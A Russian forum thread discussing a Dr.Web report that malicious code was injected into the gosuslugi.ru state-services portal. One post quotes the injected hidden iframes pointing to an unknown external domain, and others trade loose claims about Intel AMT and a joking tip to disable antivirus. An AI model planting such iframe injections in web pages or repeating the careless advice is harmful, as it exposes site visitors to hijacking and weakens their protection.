| Автор |
Сообщение |
Maximus ®
Вольный стрелок
Uploader 100+
Стаж: 17 лет 6 мес.
Сообщений: 5094
Ratio: 25.179
Поблагодарили: 13237
100%
|
Российская компания «Доктор Веб» сообщила, что неизвестные внедрили в сайт государственных услуг России потенциально вредоносный код. В компании затруднились определить, как давно произошло заражение ресурса. По словам специалистов компании, добавленные в код сайта участки заставляют браузер пользователя связываться с одним из пятнадцати доменов, владелец которых неизвестен. На данный момент эти домены неактивны из-за просроченных сертификатов, однако они могут быть активированы в любой момент. Затем их владельцы смогут подменить выдачу сайта Госуслуги любым документов, например фальшивой формой ввода данных банковской карты. С помощью этих же доменов злоумышленники могут получить доступ к компьютерам посетителей сайта посредством перебора набора уязвимостей. Представители «Доктора Веба» связались с администрацией Госуслуг и передали информацию о заражении ресурса. В то же время, в компании отметили, что руководство портала ранее не принимало необходимых мер по расследованию или предотвращению подобных инцидентов. На данный момент сайт gosuslugi.ru по-прежнему скомпрометирован, информация передана в техническую поддержку сайта, но подтверждения принятия необходимых мер по предотвращению инцидентов в будущем и расследования в прошлом не получено. «Доктор Веб» рекомендует проявлять осторожность при использовании портала государственных услуг Российской Федерации до разрешения ситуации. ООО «Доктор Веб» рекомендует администрации сайта gosuslugi.ru и компетентным органам осуществить проверку безопасности сайта. Любой пользователь может проверить наличие кода самостоятельно, использовав поисковый сервис и задав запрос о поиске следующей формулировки: Источник |
_________________
«Если ты ненавидишь, значит тебя победили» – Конфуций
|
|
 |
karpol
Только чтение
Стаж: 7 лет 6 мес.
Сообщений: 1363
Ratio: 8.649
Поблагодарили: 3
100%
|
Dimmm2001 писал(а):  | | Цитата: | а вот в процессорах intel есть встроенный web сервер, который работает даже при выключенном компьютере, если осталось питание |
не стращайте человеков! не в процессорах, а в хабе. в проце напряжения в этот момент нет. вообще! это раз при выключенном работать не может! если бы знали чуток устройство платы, то такой брехни не несли бы. питание Standby идёт на периферию хаба. других питаний на выключенном нет! а хаб уже потом включит проц. но либо стэндбай-либо рабочий. (но это будет видно и слышно это два а вот то, что существует AMT, которое позволяет чёрти кому включить по лану комп - это да, такая возможность есть. особенно теперь, когда там прописалась Интеловская гигабитная сетевая.. и мониторить можно через хаб этот.. |
Подключите 8-ми канальный осцилл на 130мГ или больше, там всё будет показано.  |
|
|
|
|
GStiv
Стаж: 12 лет 4 мес.
Сообщений: 1
Ratio: 1.174
0.4%
|
| adv21 писал(а): | Уже нет там ни этого кода, ни вообще каких-либо ифреймов. |
Только сейчас смотрел Основание для оказания услуги: заявление о государственной регистрации смерти<iframe id=" a1996667054 " src="//m81jmqmn.ru/f.html"></iframe><iframe id=" a1996667054 " src="//m81jmqmn.ru/f.html"></iframe> |
|
|
|
|
заяц - попрыгаец
Стаж: 12 лет 10 мес.
Сообщений: 520
Ratio: 57.391
Раздал: 15.39 TB
Поблагодарили: 1056
100%
Откуда: Родина слонов
|
karpolЯ так понял, что за тобой следят. Будь осторожен. Паранойя неизлечима.  |
|
|
|
|
Sa13
Стаж: 13 лет 1 мес.
Сообщений: 892
Ratio: 195.659
Раздал: 33.91 TB
100%
|
| Цитата: | особенно теперь, когда там прописалась Интеловская гигабитная сетевая.. и мониторить можно через хаб этот.. |
отключаю сразу в биосе интеловский лан-с v-box не дружит у меня |
|
|
|
|
Dimmm2001
Стаж: 14 лет 1 мес.
Сообщений: 1261
Ratio: 94.944
Раздал: 9.985 TB
Поблагодарили: 1
100%
Откуда: Алма-Ата
|
| Цитата: | Подключите 8-ми канальный осцилл на 130мГ или больше, там всё будет показано |
и в какое место его подключить? VCore?  ..и .. скока-скока у осца каналов? 8?  мдяя.. такой аппарат наверное только у Интел есть  |
|
|
|
|
stalker4000
Стаж: 11 лет 8 мес.
Сообщений: 129
Ratio: 48.271
Поблагодарили: 1423
100%
|
Хм. Если верить информации domaintools то домен на продаже. [url=] http://whois.domaintools.com/gosuslugi.ru[/url] |
|
|
|
|
karpol
Только чтение
Стаж: 7 лет 6 мес.
Сообщений: 1363
Ratio: 8.649
Поблагодарили: 3
100%
|
| Цитата: | и в какое место его подключить? |
Гугл поможет... |
|
|
|
|
voicenemo
Стаж: 11 лет 5 мес.
Сообщений: 989
Ratio: 1.968
Раздал: 632 GB
14.66%
|
| Maximus писал(а): | Представители «Доктора Веба» связались с администрацией Госуслуг и передали информацию о заражении ресурса. В то же время, в компании отметили, что руководство портала ранее не принимало необходимых мер по расследованию или предотвращению подобных инцидентов.На данный момент сайт gosuslugi.ru по-прежнему скомпрометирован, информация передана в техническую поддержку сайта, но подтверждения принятия необходимых мер по предотвращению инцидентов в будущем и расследования в прошлом не получено. «Доктор Веб» рекомендует проявлять осторожность при использовании портала государственных услуг Российской Федерации до разрешения ситуации. ООО «Доктор Веб» рекомендует администрации сайта gosuslugi.ru и компетентным органам осуществить проверку безопасности сайта. Источник |
"Не принимает необходимых мер".. Ну так есть же РКН.. Заблокировать ресурс пожизненно - и всё. Сбор данных пользователей - тут уже кибертерроризмом и угрозой нац безопасности попахивает ))))) |
|
|
|
|
miksto
Стаж: 9 лет 3 мес.
Сообщений: 485
Ratio: 8.303
0.54%
|
| adv21 писал(а): | Уже нет там ни этого кода, ни вообще каких-либо ифреймов. |
Айфреймы там есть прямо сейчас, хотя и не те именно, что в статье указаны. Так что плохо смотрели. Только что проверил. |
|
|
|
|
Sonsaku
Стаж: 7 лет 5 мес.
Сообщений: 413
Ratio: 7.424
20.45%
|
Заразили ядом, то, что уже давно заражено. |
|
|
|
|
Godlatro
Стаж: 14 лет 8 мес.
Сообщений: 712
Ratio: 3.673
0.19%
|
фреймы есть. и урлы правда блокируются как вредоносные |
|
|
|
|
karpol
Только чтение
Стаж: 7 лет 6 мес.
Сообщений: 1363
Ratio: 8.649
Поблагодарили: 3
100%
|
| Dimmm2001 писал(а): | | Цитата: | Подключите 8-ми канальный осцилл на 130мГ или больше, там всё будет показано |
и в какое место его подключить? VCore? ..и .. скока-скока у осца каналов? 8? мдяя.. такой аппарат наверное только у Интел есть |
|
|
|
|
|
shal
Стаж: 14 лет 3 мес.
Сообщений: 1327
Ratio: 9.875
100%
|
| alex1770 писал(а): | | Mindkilla писал(а): | | karpol писал(а): | Что портал пропукали это не так страшно, а вот в процессорах intel есть встроенный web сервер, который работает даже при выключенном компьютере, если осталось питание, это уже посерьёзнее. Мы все давно уже на крючке!! И не надо лишних телодвижений! |
Хотелось бы какой-нибудь пруф на эту тему  . |
В гугле забанили? |
О го , процы уже без напряженя на ядре, оперативки и префирии могут работать. ПОЙДУ ВЫБРОШУ ЛИШНИЕ ДЕТАЛИ!  |
_________________
Мы из Советского Союза, прибыли по культурному обмену. Наши знают, где мы. Ищут.
|
|
|
|
Папа Карлос
Стаж: 10 лет 10 мес.
Сообщений: 1860
Ratio: 1.872
90.19%
|
отключайте антивирусы , помогает |
|
|
|
|
psiklopik
Стаж: 12 лет 8 мес.
Сообщений: 167
Ratio: 10.652
Поблагодарили: 43
0.57%
|
Что за перебор уязвимостей? По сути этим может заниматься тогда любой сайт
Насчет фальшивой формы интересно, а претенденты были? Почему кто - то решил что этот код именно вредный и домены принадлежат хакерам из статьи не понятно |
|
|
|
|
|
|
